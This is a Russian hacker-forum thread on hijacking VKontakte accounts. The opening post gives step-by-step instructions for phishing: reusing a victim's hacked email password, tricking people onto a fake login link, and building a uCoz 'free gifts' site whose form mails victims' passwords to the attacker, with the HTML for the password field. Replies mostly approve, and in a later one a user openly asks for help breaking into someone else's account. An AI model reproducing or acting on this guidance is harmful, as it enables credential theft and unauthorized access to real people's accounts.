Хакерский форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Хакерский форум » Для новичков » Взлом контакта


Взлом контакта

Сообщений 1 страница 15 из 15

1

Привет всем! Сейчас я расскажу как ломануть контакт.Есть 3 способа (их больше, но я расскажу три).
1.
Ломаем мыло (Отвечаем на секретный вопрос или еще что то) и если человек лол, то он вероятно поставит вконтакте такойже пароль! =)
Ну а если человек осторожный, то вам не повезло.
2.
Создать фэйк (как это делается есть на форуме!).
Говорим мол, "Зайди через этот сайт вконтакт, он будет быстрее работать" или "Тебе дадут бесплатные голоса и рейтинг" и если человек полный идиот, то он это сделает! Ну можно еще типо так "У меня теперь контакт быстро работает!", он естественно спрашивает "как?!", вы ему втираете, мол за один голос (а это увереяет его, что это не развод), он говорит "скажи как другу" и тп и тд, вы делаете вид что он вас уговорил (после долгого общения) и даете ему ссылку, например так " Лано уговорил, вот сслыка, ты мой должник! http://www.rapmilo.h16.ru"  Кстати у меня получилось уломать друга...надо действовать на психику! =)
3.
И так это самый...ну...нормальный вообщем способ.
Регистрируемся на http://www.ucoz.ru/ . Создаем сайт называем его, что то типо "Бесплатные подарки вконтакте" или "Бесплатные голоса и рейтинг". Когда вы будите выбирать модули, то берите только "Редактор страниц" и "Почтовые формы". Больше вам и не понадобится! Далее вас перекинут в панель управления (ПУ). Выбираете "Почтовые формы » Управление почтовыми формами". У вас будет только одна почтовая форма, она называется "Обратная связь", жмем на гаичный ключик (ГК) рядом с ней. В "Название почтовой формы:" Пишите "ОТправить подарок" или что то типо того! "Адреса получателей:" там стоит вашь мэйл, изменять впринципе ни чего не надо."Ответ об успешной отправке письма:" пишите "Вашь подарок успешно отправлен!".Все нажимаете изменить! Теперь выбираем "[ Конструктор полей ]". Удаляем все лишнее:Web-site, Оценка сайта. Жмете ГК, где "Тема письма"  и переименовываете на "Ваш пароль". А "Текст сообщения" на "Ваш ID". Теперь "Почтовые формы » Управление формами »" нажимем "Управление дизайном" (левее ГК). Ищем там строчку "<tr><td>Ваш пароль:..." и заменяем её всю на "<tr><td>Ваш пароль:</td><td><input type="password" name="password" size="20" type="text" name="f2" size="30" style="width:95%;" maxlength="70" > </td></tr>". Да лее заходим на ваш сайт, ввеху нажимем "конструктор - Включить конструктор". Где меню сайта выбираем ГК и ищем там "Обратная связь" далее переименнуем её на "Отправить подарок". Нажимаем "Сохранить" и выходим "Конструктор - Отключить конструктор" Вот и все! Уламывайте чела, действуя на психику =)Письмо придет вам на мэйл!
Ну еще можно кинуть ложные номера! Адресс, название компании которая создала этот лохотрон =) И прочию херню, фантазируйте! Удачи! 
Если, что не понятно, спрашивайте!
Помог? Ставь +! =)

+4

2

HaTeR написал(а):

Ломаем мыло (Отвечаем на секретный вопрос или еще что то) и если человек лол, то он вероятно поставит вконтакте такойже пароль! =)
Ну а если человек осторожный, то вам не повезло.

это полный лол

HaTeR написал(а):

Создать фэйк (как это делается есть на форуме!).
Говорим мол, "Зайди через этот сайт вконтакт, он будет быстрее работать" или "Тебе дадут бесплатные голоса и рейтинг" и если человек полный идиот, то он это сделает! Ну можно еще типо так "У меня теперь контакт быстро работает!", он естественно спрашивает "как?!", вы ему втираете, мол за один голос (а это увереяет его, что это не развод), он говорит "скажи как другу" и тп и тд, вы делаете вид что он вас уговорил (после долгого общения) и даете ему ссылку, например так " Лано уговорил, вот сслыка, ты мой должник! http://www.rapmilo.h16.ru"  Кстати у меня получилось уломать друга...надо действовать на психику! =)

:)

0

3

полезная статейка для начинающих! +1

0

4

ААа! спассибо я ппонял! как это делать спс!!!

0

5

хаха

0

6

godl_23  эээ

0

7

HaTeR написал(а):

1.
Ломаем мыло (Отвечаем на секретный вопрос или еще что то) и если человек лол, то он вероятно поставит вконтакте такойже пароль! =)
Ну а если человек осторожный, то вам не повезло.

вообще бред, вопервых как ты мыло узнаешь?
Вовторых сейчас привязка к телефонам у новых логинов..

0

8

Venom написал(а):

HaTeR написал(а):
1.
Ломаем мыло (Отвечаем на секретный вопрос или еще что то) и если человек лол, то он вероятно поставит вконтакте такойже пароль! =)
Ну а если человек осторожный, то вам не повезло.

Это полный fail и бред

0

9

grab написал(а):

Ну если ты хакер ты бы не задавал такой вопрос. Просто просишь жертву дать тебе ее email и придумать для этого истории разные. Тут проще простого.

аха, меня зовут вася пупкин, дайте мне ваш мэйл.
Я же говорю, 2 и 3 - кул, а первый способ уже почти не актуален. Вот у меня есть мыло одного человека, я даже пароль от мыла знаю, а толку 0 от этого. вся привязка к мобиле.. ну а если пароль от мыла такойже окажется как и от контакта - тогда вопрос - что за лольщину ломанул???

0

10

приветствую!
ребят, интересует взлом страницы в вк...
не могли бы помочь, на ваших условиях...
из данных id  и почта на который зарегин акк

408-091-064 icq для связи

0

11

perry написал(а):

приветствую!
ребят, интересует взлом страницы в вк...
не могли бы помочь, на ваших условиях...
из данных id  и почта на который зарегин акк
408-091-064 icq для связи

Значит так:
1. Теперь привязка вконтакте только к мобильному телефону, и почта не поможет
2. Даже если ты владеешь почтой, то нужно заполнять заявку модераторам сайта, в которой нужно указывать подробные данные пользователя, включая фотографии на рабочем месте с видом на страницу
3. Можно взломать только подбором, фейком или СИ(ну если пользователь знает или предполагает, что его будут взламывать, то такой способ не прокатит 99%)

0

12

м-мм..
на случай привязки к телефону..  номер на который был привязан акк утерян и не юзаеца. к новому номеру не привязан..
подбор фейков не думаю, что покатит..

вообщем я ищу человека, который сможет мне помочь с помощью специального софта, определенных знаний.. на его условиях
надеюсь.. :)

0

13

perry написал(а):

вообщем я ищу человека, который сможет мне помочь с помощью специального софта, определенных знаний.. на его условиях
надеюсь..

а вкратце ситуацию объясни, из твоих слов понятно, что это твой утерянный акк

0

14

perry написал(а):

приветствую!ребят, интересует взлом страницы в вк...не могли бы помочь, на ваших условиях...из данных id  и почта на который зарегин акк
            408-091-064 icq для связи

:offtop:

0

15

нетнет, это не мой утерянный акк :)
это акк человека, из которого мне известна почта и то что привязанный моб.номер к акк утерян...
мы тут тему развели пустословную...
ближе к делу.. icq

0


Вы здесь » Хакерский форум » Для новичков » Взлом контакта